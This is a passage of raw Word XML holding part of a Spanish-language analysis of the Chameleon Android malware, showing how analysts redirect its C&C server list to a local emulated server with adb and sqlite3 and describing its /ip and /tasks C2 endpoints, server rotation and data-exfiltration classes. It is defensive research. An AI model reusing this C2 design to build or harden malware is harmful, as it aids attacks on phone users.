        <w:t xml:space="preserve">de </w:t>
      </w:r>
      <w:r w:rsidR="0044401E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">whois. Esto podría hacer referencia a pruebas </w:t>
      </w:r>
      <w:r w:rsidR="0044081D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>realizadas</w:t>
      </w:r>
      <w:r w:rsidR="0044401E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> por parte de los atacantes</w:t>
      </w:r>
      <w:r w:rsidR="00284BE8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, aunque no se puede determinar con seguridad, pues </w:t>
      </w:r>
      <w:r w:rsidR="002058D6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">la entidad registradora del dominio </w:t>
      </w:r>
      <w:r w:rsidR="00284BE8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">no </w:t>
      </w:r>
      <w:r w:rsidR="002058D6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">está </w:t>
      </w:r>
      <w:r w:rsidR="00284BE8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>necesariamente relacionada con el malware Chameleon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D21B92C" w14:textId="0A7E284C" w:rsidR="001C765B" w:rsidRDefault="004F3DDC" w:rsidP="00D90BB6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Para tratar de interceptar la comunicación entre el malware y los servidores, ya que estos no se encuentran disponibles en el momento de la realización de los análisis, se ha determinado la necesidad de crear un servidor local que sea el encargado de simular ser un servidor C&amp;C y establecer comunicación con el malware del dispositivo emulado</w:t>
      </w:r>
      <w:r w:rsidR="007D136E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, así como de instrumentar y analizar estas comunicaciones utilizando las herramientas Frida y Wireshark descritas anteriormente</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. La solución más simple para realizar esto es alterar la información que utiliza Chameleon para establecer las comunicaciones, que como se ha explicado previamente se almacena en la base de datos SQLite del dispositivo infectado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFC0827" w14:textId="4D0D7A8F" w:rsidR="004F3DDC" w:rsidRDefault="00442BBC" w:rsidP="00D90BB6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Para ello </w:t>
      </w:r>
      <w:r w:rsidR="00251603">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>se han seguido</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> los siguientes pasos, haciendo uso nuevamente de la herramienta adb:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624E1A98" w14:textId="1CC701BB"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adb shell</w:t>
      </w:r>
      <w:r w:rsidR="00251603">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00442BBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00251603">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>con la finalidad de</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> obtener una consola en el dispositivo emulado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695F2065" w14:textId="611066F1" w:rsidR="00442BBC" w:rsidRPr="00442BBC" w:rsidRDefault="00442BBC" w:rsidP="00442BBC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442BBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:tab/>
        <w:t>- cd /data/user/0/com.busy.lady/databases</w:t>
      </w:r>
      <w:r w:rsidR="00251603">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00442BBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">para </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>acceder al directorio en el que se almacena la base de datos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016AA11B" w14:textId="04CFFCFA" w:rsidR="00442BBC" w:rsidRPr="00442BBC" w:rsidRDefault="00442BBC" w:rsidP="00016E7E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442BBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:tab/>
        <w:t>- sqlite3</w:t>
      </w:r>
      <w:r w:rsidR="00016E7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00016E7E" w:rsidRPr="00016E7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>00000000-53b7-fecb-0000-00002ba3a1f0.db</w:t>
      </w:r>
      <w:r w:rsidR="00251603">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: cuyo objetivo es </w:t>
      </w:r>
      <w:r w:rsidR="00016E7E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">establecer una conexión con la base de datos a través de la herramienta de línea de comandos sqlite3. Hay que tener en cuenta que el nombre de la base de datos es diferente en </w:t>
      </w:r>
      <w:r w:rsidR="00016E7E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>cada dispositivo infectado, y hace referencia al identificador único generado en la clase “</w:t>
      </w:r>
      <w:r w:rsidR="00016E7E" w:rsidRPr="00711B4E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>IdentifierGenerator</w:t>
      </w:r>
      <w:r w:rsidR="00016E7E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">” desofuscada durante el análisis estático. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B33730" w14:textId="304878DB" w:rsidR="00442BBC" w:rsidRPr="00442BBC" w:rsidRDefault="00442BBC" w:rsidP="00442BBC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442BBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:tab/>
        <w:t>- select * from servers;</w:t>
      </w:r>
      <w:r w:rsidR="00784753">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00442BBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00442BBC">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">para comprobar los datos </w:t>
      </w:r>
      <w:r w:rsidR="00251603">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">de servidores </w:t>
      </w:r>
      <w:r w:rsidRPr="00442BBC">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>existentes</w:t>
      </w:r>
      <w:r w:rsidR="00251603">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B6288">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>y adaptar la posterior inserción de datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E74EF85" w14:textId="5813A9FF" w:rsidR="00442BBC" w:rsidRPr="00784753" w:rsidRDefault="00442BBC" w:rsidP="00442BBC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442BBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00784753">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">- insert into servers(id, url) values(3, </w:t>
      </w:r>
      <w:r w:rsidR="00CD1BB8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00784753">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>http://10.0.3.2:7777</w:t>
      </w:r>
      <w:r w:rsidR="00CD1BB8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">’: </w:t>
      </w:r>
      <w:r w:rsidR="00784753" w:rsidRPr="00784753">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>insertando una nueva entrada que haga referencia a nuestro servidor C&amp;C simulado local</w:t>
      </w:r>
      <w:r w:rsidR="00784753">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CE05CE" w14:textId="287D8FFE" w:rsidR="0016232E" w:rsidRPr="009150FE" w:rsidRDefault="00992CBA" w:rsidP="00D90BB6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Para determinar la dirección IP que tendrá nuestro servidor local, hay que tener en cuenta que no sirve con utilizar la dirección localhost estándar (127.0.0.1), sino que se tendrá que hacer uso del alias de interfaz loopback establecido por el servicio de simulación elegido. En el caso de Android Studio esta dirección sería 10.0.2.2 [X]</w:t>
      </w:r>
      <w:r w:rsidR="0016232E" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, mientras que en el caso de Genymotion la dirección será 10.0.3.2. El puerto utilizado se elige en función de los datos utilizados para la creación del servidor local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014A41E1" w14:textId="1A6887C4" w:rsidR="004C2828" w:rsidRPr="009150FE" w:rsidRDefault="0016232E" w:rsidP="00D90BB6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tras la inserción de la fila en la base de datos, la nueva dirección de servidor será utilizada por parte del malware para tratar de establecer comunicaciones. Se establecen dos tipos de peticiones diferentes dentro de la API</w:t>
      </w:r>
      <w:r w:rsidR="00DD1B8F" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que los atacantes parecen haber establecido en sus servidores C&amp;C</w:t>
      </w:r>
      <w:r w:rsidR="004C2828" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. La ruta /api/v1/bots/</w:t>
      </w:r>
      <w:r w:rsidR="00842290" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidR="004C2828" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> es la base, siendo </w:t>
      </w:r>
      <w:r w:rsidR="00842290" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidR="004C2828" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> el identificador único del dispositivo infectado mencionado previamente. A partir de esta base la API establece dos endpoints diferentes identificados durante el análisis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1430E63A" w14:textId="5E4B3274" w:rsidR="004C2828" w:rsidRPr="009150FE" w:rsidRDefault="004C2828"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00842290" w:rsidRPr="005C180C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>/ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D515AF1" w14:textId="6275824C" w:rsidR="00842290" w:rsidRPr="009150FE" w:rsidRDefault="00842290"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 </w:t>
      </w:r>
      <w:r w:rsidRPr="005C180C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>/tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBD4DBD" w14:textId="2FF6371C" w:rsidR="008D386B" w:rsidRPr="009150FE" w:rsidRDefault="008D386B"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La subruta </w:t>
      </w:r>
      <w:r w:rsidRPr="005C180C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>/ip</w:t>
      </w:r>
      <w:r w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> se utiliza</w:t>
      </w:r>
      <w:r w:rsidR="00EE2897" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para obtener nuevas direcciones de servidores C&amp;C dentro del método </w:t>
      </w:r>
      <w:r w:rsidR="00EE2897" w:rsidRPr="005C180C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>refreshRemoteServerInfo()</w:t>
      </w:r>
      <w:r w:rsidR="00EE2897" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la clase </w:t>
      </w:r>
      <w:r w:rsidR="00EE2897" w:rsidRPr="005C180C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>DataExfiltrationManager</w:t>
      </w:r>
      <w:r w:rsidR="00EE2897" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Tras recibir una respuesta correcta del servidor remoto, procede a almacenar los datos recibidos en la tabla “servers”. De esta manera, el malware puede garantizar hasta cierto punto su resiliencia, permitiendo establecer comunicaciones con nuevos servidores remotos en el caso de que </w:t>
      </w:r>
      <w:r w:rsidR="00C003E2" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">algunos de </w:t>
      </w:r>
      <w:r w:rsidR="00EE2897" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">los existentes dejen de estar disponibles. Chameleon realiza una rotación de peticiones a los diferentes </w:t>
      </w:r>
      <w:r w:rsidR="003D43E0">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>nombres de host</w:t>
      </w:r>
      <w:r w:rsidR="00EE2897" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> almacenados, buscando siempre con</w:t>
      </w:r>
      <w:r w:rsidR="00EE2897" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">tinuar el proceso </w:t>
      </w:r>
      <w:r w:rsidR="00BD67F3" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">con el siguiente servidor </w:t>
      </w:r>
      <w:r w:rsidR="00EE2897" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>si no se recibe una respuesta satisfactoria</w:t>
      </w:r>
      <w:r w:rsidR="00652AD4" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> del actual</w:t>
      </w:r>
      <w:r w:rsidR="00EE2897" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FFFC2C" w14:textId="1E8839C8" w:rsidR="00EE2897" w:rsidRPr="009150FE" w:rsidRDefault="00EE2897" w:rsidP="00D90BB6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Por otro lado, la subruta </w:t>
      </w:r>
      <w:r w:rsidRPr="005C180C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>/tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> es la encargada de enviar órdenes al dispositivo infectado</w:t>
      </w:r>
      <w:r w:rsidR="001375E2" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, siendo la exfiltración de datos gestionada por la clase DataExfiltrationController la encargada de realizar las operaciones en función de los datos solicitados por el servidor remoto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220911D2" w14:textId="3E1DEA63" w:rsidR="008D386B" w:rsidRPr="009150FE" w:rsidRDefault="003B2260"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La comunicación se realiza mediante peticiones HTTP, aunque también es posible </w:t>
      </w:r>
      <w:r w:rsidR="007416D9" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>pasar a utilizar el</w:t>
      </w:r>
      <w:r w:rsidR="00F04857" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> protocolo</w:t>
      </w:r>
      <w:r w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> WebSocket</w:t>
      </w:r>
      <w:r w:rsidR="007416D9" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, dependiendo de los datos recibidos del servidor C2. En el caso de WebSocket la comunicación pasa</w:t>
      </w:r>
      <w:r w:rsidR="00276A74" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ría</w:t>
      </w:r>
      <w:r w:rsidR="007416D9" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> a ser bidireccional</w:t>
      </w:r>
      <w:r w:rsidR="00562105" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (también conocida como full-duplex)</w:t>
      </w:r>
      <w:r w:rsidR="007416D9" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, lo que habilita una comunicación más ágil comparada con las peticiones HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00562105" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, que solamente permiten el envío de datos en una dirección en un momento concreto.</w:t>
      </w:r>
      <w:r w:rsidR="00276A74" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> El malware también refleja en su código la posibilidad de utilizar HTTPS, aunque principalmente está orientado </w:t>
      </w:r>
      <w:r w:rsidR="0019704D" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C63FDEF" w14:textId="0128BEC8" w:rsidR="00EC7E28" w:rsidRPr="009150FE" w:rsidRDefault="00EC7E28" w:rsidP="00D90BB6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009150FE">
        <w:rPr>
